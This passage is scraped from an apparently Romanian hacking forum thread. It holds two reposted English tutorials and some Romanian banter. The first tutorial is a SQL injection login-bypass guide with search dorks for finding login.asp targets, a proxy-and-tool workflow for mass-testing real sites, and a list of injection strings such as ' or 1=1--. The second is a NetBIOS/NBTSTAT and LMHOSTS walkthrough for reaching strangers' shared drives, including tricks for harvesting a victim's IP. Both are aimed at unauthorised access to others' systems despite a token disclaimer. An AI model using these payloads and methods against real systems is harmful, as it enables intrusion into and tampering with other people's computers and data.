do check for these vulnerabilities and most of the time one of these works. I hope that, what i written was helped you in some way. Thanks for reading it, please continue to support me as i continue to release this sortta papers. If you wanna learn more, please check the mentioned people’s web sites for more details and you can even write to me. Peace in mind Watch your servers in wild
  12. Author: ComSec One of the major problems with SQL is its poor security issues surrounding is the login and url strings. this tutorial is not going to go into detail on why these string work as am not a coder i just know what i know and it works SEARCH: admin\login.asp login.asp with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question WHAT I DO : first let me go into details on how i go about my research i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member.. http://governmentsecurity.org "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder INJECTION STRINGS:HOW ? this is the easiest part...very simple on the login page just enter something like user:admin (you dont even have to put this.) pass:' or 1=1-- or user:' or 1=1-- admin:' or 1=1-- some sites will have just a password so password:' or 1=1-- infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used there are many other strings involving for instance UNION table access via reading the error pages table structure thus an attack with this method will reveal eventually admin U\P paths...but thats another paper the one am interested in are quick access to targets PROGRAM i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes how long would it take to go thought 40 sites cutting and pasting each string ?? combo example: admin:' or a=a-- admin:' or 1=1-- and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection string now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever inurl:login.asp index of:/admin/login.asp like this: index of login.asp result: http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search 17,000 possible targets trying various searches spews out plent more now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so http://www.somesite.com/login.asp http://www.another.com/admin/login.asp and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into problems with users using Ares..thing is i know it works for me... sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable. there you go you should have access to your vulnerable target by now another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes user=' or 1=1-- just as quick as login process (Variations) admin'-- ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a happy hunting ComSec aka ZSL http://comsec.governmentsecurity.org ******************************************* WARNING: the information provided is for educationally purposes only and not to be used for malicious use. i hold no responsibility for your actions...do the right thing and let admins know ay ******************************************
  13. By anand bhaskar --------------hacking the bios-------------- by anand bhaskar. hey friends, i know hacking with bios is considered lame by the hackers n it indeed is lame but i m sure this gives a good practice at the intial stages n some idea of what the hell it like getting into someone else's computer. the basic limitation of this method is that only shared files can b accessed.however there r ways to hack the not shared one's too but is all i wish too provide u all now.enjoy. introduction 1. Hardware and Firmware 1a. The BIOS The BIOS, short for Basic Input/Output Services, is the control program of the PC. It is responsible for starting up your computer, transferring control of the system to your operating system, and for handling other low-level functions, such as disk access. NOTE that the BIOS is not a software program, insofar as it is not purged from memory when you turn off the computer. It's firmware, which is basically software on a chip. A convenient little feature that most BIOS manufacturers include is a startup password. This prevents access to the system until you enter the correct password. If you can get access to the system after the password has been entered, then there are numerous software-based BIOS password extractors available from your local H/P/A/V site. NETBIOS/NBTSTAT - What does it do? 2. NETBIOS, also known as NBTSTAT is a program run on the Windows system and is used for identifying a remote network or computer for file sharing enabled. We can expoit systems using this method. It may be old but on home pc's sometimes it still works great. You can use it on your friend at home or something. I don't care what you do, but remember, that you are reading this document because you want to learn. So I am going to teach you. Ok. So, you ask, "How do i get to NBTSTAT?" Well, there are two ways, but one's faster. Method 1 -===============- Start Programs MSDOS PROMPT Type NBTSTAT -===============- Method 2 -===============- Start Run Type Command Type NBTSTAT -===============- (Note: Please, help your poor soul if that isn't like feeding you with a baby spoon.) Ok! Now since you're in the DOS command under NBTSTAT, you're probably wondering what all that crap is that's on your screen. These are the commands you may use. I'm only going to give you what you need to know since you are striving to be l33t. Your screen should look like the following: ---------------------------------------------------------------------------------------------- NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [interval] ] -a (adapter status) Lists the remote machine's name table given its name -A (Adapter status) Lists the remote machine's name table given its IP address. -c (cache) Lists NBT's cache of remote [machine] names and their IP addresses -n (names) Lists local NetBIOS names. -r (resolved) Lists names resolved by broadcast and via WINS -R (Reload) Purges and reloads the remote cache name table -S (Sessions) Lists sessions table with the destination IP addresses -s (sessions) Lists sessions table converting destination IP addresses to computer NETBIOS names. -RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refr esh RemoteName Remote host machine name. IP address Dotted decimal representation of the IP address. interval Redisplays selected statistics, pausing interval seconds between each display. Press Ctrl+C to stop redisplaying statistics. C:\WINDOWS\DESKTOP> ----------------------------------------------------------------------------------------------- The only two commands that are going to be used and here they are: -a (adapter status) Lists the remote machine's name table given its name -A (Adapter status) Lists the remote machine's name table given its IP address. Host Names 3. Now, the -a means that you will type in the HOST NAME of the person's computer that you are trying to access. Just in case you don't have any idea what a Host Name looks like here's an example. 123-fgh-ppp.internet.com there are many variations of these adresses. For each different address you see there is a new ISP assigned to that computer. look at the difference. abc-123.internet.com ghj-789.newnet.com these are differnet host names as you can see, and, by identifying the last couple words you will be able to tell that these are two computers on two different ISPs. Now, here are two host names on the same ISP but a different located server. 123-fgh-ppp.internet.com 567-cde-ppp.internet.com IP Addresses 4. You can resolce these host names if you want to the IP address (Internet Protocol) IP addresses range in different numbers. An IP looks like this: 201.123.101.123 Most times you can tell if a computer is running on a cable connection because of the IP address's numbers. On faster connections, usually the first two numbers are low. here's a cable connection IP. 24.18.18.10 on dialup connections IP's are higher, like this: 208.148.255.255 notice the 208 is higher than the 24 which is the cable connection. REMEMBER THOUGH, NOT ALL IP ADDRESSES WILL BE LIKE THIS. Some companies make IP addresses like this to fool the hacker into believing it's a dialup, as a hacker would expect something big, like a T3 or an OC-18. Anyway This gives you an idea on IP addresses which you will be using on the nbtstat command. Getting The IP Through DC (Direct Connection) 5. First. You're going to need to find his IP or host name. Either will work. If you are on mIRC You can get it by typing /whois (nick) ...where (nick) is the persons nickname without parenthesis. you will either get a host name or an IP. copy it down. If you do not get it or you are not using mIRC then you must direct connect to their computer or you may use a sniffer to figure out his IP or host name. It's actually better to do it without the sniffer because most sniffers do not work now-a-days. So you want to establish a direct connection to their computer. OK, what is a direct connection? When you are: Sending a file to their computer you are directly connected. AOL INSTANT MESSENGER allows a Direct Connection to the user if accepted. ICQ when sending a file or a chat request acception allows a direct connection. Any time you are sending a file. You are directly connected. (Assuming you know the user is not using a proxy server.) Voice Chatting on Yahoo establishes a direct connection. If you have none of these programs, either i suggest you get one, get a sniffer, or read this next statement. If you have any way of sending thema link to your site that enables site traffic statistics, and you can log in, send a link to your site, then check the stats and get the IP of the last visitor. It's a simple and easy method i use. It even fool some smarter hackers, because it catches them off guard. Anyway, once you are directly connected use either of the two methods i showed you earlier and get into DOS. Type NETSTAT -n. NETSTAT is a program that's name is short for NET STATISTICS. It will show you all computers connected to yours. (This is also helpful if you think you are being hacked by a trojan horse and is on a port that you know such as Sub Seven: 27374.) Your screen should look like this showing the connections to your computer: ------------------------------------------------------------------------------------------------ C:\WINDOWS\DESKTOP>netstat -n Active Connections Proto Local Address Foreign Address State TCP 172.255.255.82:1027 205.188.68.46:13784 ESTABLISHED TCP 172.255.255.82:1036 205.188.44.3:5190 ESTABLISHED TCP 172.255.255.82:1621 24.131.30.75:66 CLOSE_WAIT TCP 172.255.255.82:1413 205.188.8.7:26778 ESTABLISHED TCP 172.255.255.82:1483 64.4.13.209:1863 ESTABLISHED C:\WINDOWS\DESKTOP> ------------------------------------------------------------------------------------------------ The first line indicated the Protocol (language) that is being used by the two computers. TCP (Transfer Control Protocol) is being used in this and is most widely used. Local address shows your IP address, or the IP address of the system you on. Foreign address shows the address of the computer connected to yours. State tells you what kind of connection is being made ESTABLISHED - means it will stay connected to you as long as you are on the program or as long as the computer is allowing or is needing the other computers connection to it. CLOSE_WAIT means the connection closes at times and waits until it is needed or you resume connection to be made again. One that isn't on the list is TIME_WAIT which means it is timed. Most Ads that run on AOL are using TIME_WAIT states. the way you know the person is directly connected to your computer is because of this: ------------------------------------------------------------------------------------------------ C:\WINDOWS\DESKTOP>netstat -n Active Connections Proto Local Address Foreign Address State TCP 172.255.255.82:1027 205.188.68.46:13784 ESTABLISHED TCP 172.255.255.82:1036 205.188.44.3:5190 ESTABLISHED TCP 172.255.255.82:1621 24.131.30.75:66 CLOSE_WAIT TCP 172.255.255.82:1413 abc-123-ppp.webnet.com ESTABLISHED TCP 172.255.255.82:1483 64.4.13.209:1863 ESTABLISHED C:\WINDOWS\DESKTOP> ------------------------------------------------------------------------------------------------ Notice the host name is included in the fourth line instead of the IP address on all. This is almost ALWAYS, the other computer that is connected to you. So here, now, you have the host name: abc-123-ppp.webnet.com If the host name is not listed and the IP is then it NO PROBLEM because either one works exactly the same. I am using abc-123-ppp.webnet.com host name as an example. Ok so now you have the IP and/or host name of the remote system you want to connect to. Time to hack! Open up your DOS command. Open up NBTSTAT by typing NBTSTAT. Ok, there's the crap again. Well, now time to try out what you have leanred from this document by testing it on the IP and/or host name of the remote system. Here's the only thing you'll need to know. IMPORTANT, READ NOW!!! -a (adapter status) Lists the remote machine's name table given its name -A (Adapter status) Lists the remote machine's name table given its IP address. Remember this? Time to use it. -a will be the host name -A will be the IP How do i know this? Read the Statements following the -a -A commands. It tells you there what each command takes. So have you found which one you have to use? GOOD! Time to start. Using it to your advantage 6. Type this if you have the host name only. NBTSTAT -a (In here put in hostname without parenthesis) Type this is you have the IP address only. NBTSTAT -A (In here put in IP address without parenthesis) Now, hit enter and wait. Now Either one of two things came up 1. Host not found 2. Something that looks like this: -------------------------------------------- NetBIOS Local Name Table Name Type Status --------------------------------------------- GMVPS01 <00> UNIQUE Registered WORKGROUP <00> GROUP Registered GMVPS01 <03> UNIQUE Registered GMVPS01 <20> UNIQUE Registered WORKGROUP <1E> GROUP Registered --------------------------------------------- If the computer responded "Host not found" Then either one of two things are the case: 1. You screwed up the host name. 2. The host is not hackable. If number one is the case you're in great luck. If two, This system isn't hackable using the NBTSTAT command. So try another system. If you got the table as above to come up, look at it carefully as i describe to you each part and its purpose. Name - states the share name of that certain part of the computer <00>, <03>, <20>, <1E> - Are the Hexidecimal codes giving you the services available on that share name. Type - Is self-explanatory. It's either turned on, or activated by you, or always on. Status - Simply states that the share name is working and is activated. Look above and look for the following line: GMVPS01 <20> UNIQUE Registered See it? GOOD! Now this is important so listen up. The Hexidecimanl code of <20> means that file sharing is enabled on the share name that is on that line with the hex number. So that means GMVPS01 has file sharing enabled. So now you want to hack this. Here's How to do it. (This is the hard part) LMHOST File 7. There is a file in all Windows systems called LMHOST.sam. We need to simply add the IP into the LMHOST file because LMHOST basically acts as a network, automatically logging you on to it. So go to Start, Find, FIles or Folders. Type in LMHOST and hit enter. when it comes up open it using a text program such as wordpad, but make sure you do not leave the checkmark to "always open files with this extension" on that. Simply go through the LMHOST file until you see the part: # This file is compatible with Microsoft LAN Manager 2.x TCP/IP lmhosts # files and offers the following extensions: # # #PRE # #DOM: # #INCLUDE # #BEGIN_ALTERNATE # #END_ALTERNATE # \0xnn (non-printing character support) # # Following any entry in the file with the characters "#PRE" will cause # the entry to be preloaded into the name cache. By default, entries are # not preloaded, but are parsed only after dynamic name resolution fails. # # Following an entry with the "#DOM:" tag will associate the # entry with the domain specified by . This affects how the # browser and logon services behave in TCP/IP environments. To preload # the host name associated with #DOM entry, it is necessary to also add a # #PRE to the line. The is always preloaded although it will not # be shown when the name cache is viewed. # # Specifying "#INCLUDE " will force the RFC NetBIOS (NBT) # software to seek the specified and parse it as if it were # local. is generally a UNC-based name, allowing a # centralized lmhosts file to be maintained on a server. # It is ALWAYS necessary to provide a mapping for the IP address of the # server prior to the #INCLUDE. This mapping must use the #PRE directive. # In addtion the share "public" in the example below must be in the # LanManServer list of "NullSessionShares" in order for client machines to # be able to read the lmhosts file successfully. This key is under # \machine\system\currentcontrolset\services\lanmanserver\parameters\nullsessionshares # in the registry. Simply add "public" to the list found there. # # The #BEGIN_ and #END_ALTERNATE keywords allow multiple #INCLUDE # statements to be grouped together. Any single successful include # will cause the group to succeed. # # Finally, non-printing characters can be embedded in mappings by # first surrounding the NetBIOS name in quotations, then using the # \0xnn notation to specify a hex value for a non-printing character. Read this over and over until you understand the way you want your connection to be set. Here's an example of how to add an IP the way I would do it: #PRE #DOM:255.102.255.102 #INCLUDE Pre will preload the connection as soon as you log on to the net. DOM is the domain or IP address of the host you are connecting to. INCLUDE will automaticall set you to that file path. In this case as soon as I log on to the net I will get access to 255.102.255.102 on the C:/ drive. The only problem with this is that by doin the NETSTAT command while you are connected, and get the IP of your machine. That's why it only works on simple PC machines. Because people in these days are computer illiterate and have no idea of what these commands can do. They have no idea what NETSTAT is, so you can use that to your advantage. Most PC systems are kind of hard to hack using this method now because they are more secure and can tell when another system is trying to gain access. Also, besure that you (somehow) know whether they are running a firewall or not because it will block the connection to their computer. Most home systems aren't running a firewall, and to make it better, they don't know how operate the firewall, therefore, leaving the hole in the system. To help you out some, it would be a great idea to pick up on some programming languages to show you how the computer reads information and learn some things on TCP/IP (Transfer Control Protocol/Internet Protocol) If you want to find out whether they are running a firewall, simply hop on a Proxy and do a port scan on their IP. You will notice if they are running a firewall because most ports are closed. Either way, you still have a better chance of hacking a home system than hacking Microsoft. Gaining Access 7. Once you have added this to you LMHOST file. You are basically done. All you need to do is go to: Start Find Computer Once you get there you simply type the IP address or the host name of the system. When it comes up, simply double click it, and boom! There's a GUI for you so you don't have to use DOS anymore. You can use DOS to do it, but it's more simple and fun this way, so that's the only way i put it. When you open the system you can edit, delete,
  14. BizZaroO

    Kre@toR

    de cate ori am citit acelasi lucru: sunteti cei mai tari wow ce forum k-lumea am auzit ca e tare rau forumu ( ce destept e google asta ) si alte dastea nu e pentru unii e pentru aia stresanti care intra, iau programele sa le puna pe alte forumuri si in rest stau si se uita si mai posteaza si ei pe la off topic si pe la bine ai venit sunteti penibili nu mai mintiti nu va crede nimeni nu e pentru Kre@tor cine stie se simte
  15. ma in curand va faceti parc in curtea blocului... mai avei sa furati neste leagane, balansoare, topogane si sa luati o tasnitoare daia furati neste tevi va legati la reteaua de apa (sa aveti si apa sa beti nu de alta) si gata... parc facut din alte parcuri
×
×
  • Create New...